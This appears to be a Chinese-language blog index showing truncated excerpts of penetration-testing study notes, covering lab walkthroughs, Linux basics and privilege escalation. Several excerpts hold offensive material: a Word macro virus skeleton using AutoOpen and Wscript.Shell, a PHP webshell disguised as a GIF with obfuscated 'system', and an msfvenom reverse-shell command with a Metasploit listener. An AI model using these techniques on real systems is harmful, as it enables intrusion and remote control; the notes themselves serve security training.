简介point 20NukemDifficulty INTERMEDIATErated by community INTERMEDIAT You shall not pass. 实验环境攻击者 Kali 192.168.45.209受害者 IP 192.168.181.126  Linux 1. 信息收集收集受...

1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...

1. 用户Linux中每个用户是通过User ld (UID) 来唯一标识的  ·管理员:root,0  ·普通用户:1-60000自动分配        ·系统用户:1-499(rhel6以前),1-999(rhel7 以后)          对守护...

1. 信息收集之环境变量提权-信息收集找到可以利用的环境变量shell变量的类型（1）本地变量【局部变量】（2）环境变量【全局变量】作用：设置系统和用户的工作环境环境变量是未在当前进程中定义...

php名字改成.gif写入GIF89a的头使用拼接绕过GIF89a <?php $a='Met'.'syS'; #把system倒过来写 $b=strtolower($a); #将a变量中的字符全部小写 $c=strrev($b); #将b变量中的字符倒过来 得到$c=...

简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...

1. 推荐步骤1. 在攻击端（如Kali主机）架设和启动一个Web服务器（或其他服务），其目的是把这些自动化脚本（工具）传输到靶标2. 在目标系统的受限shell下，去做以下工作：2.1 改变当前目录到一...

frame contains '指定字符' 

在文件系统上查找符合条件的文件文件查找：locate，find    ·非实时查找（数据库查找）：locate    ·实时查找：find1. locatelocate查询系统上预建的文件索引数据库/var/lib/mlocate/mloc...

1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...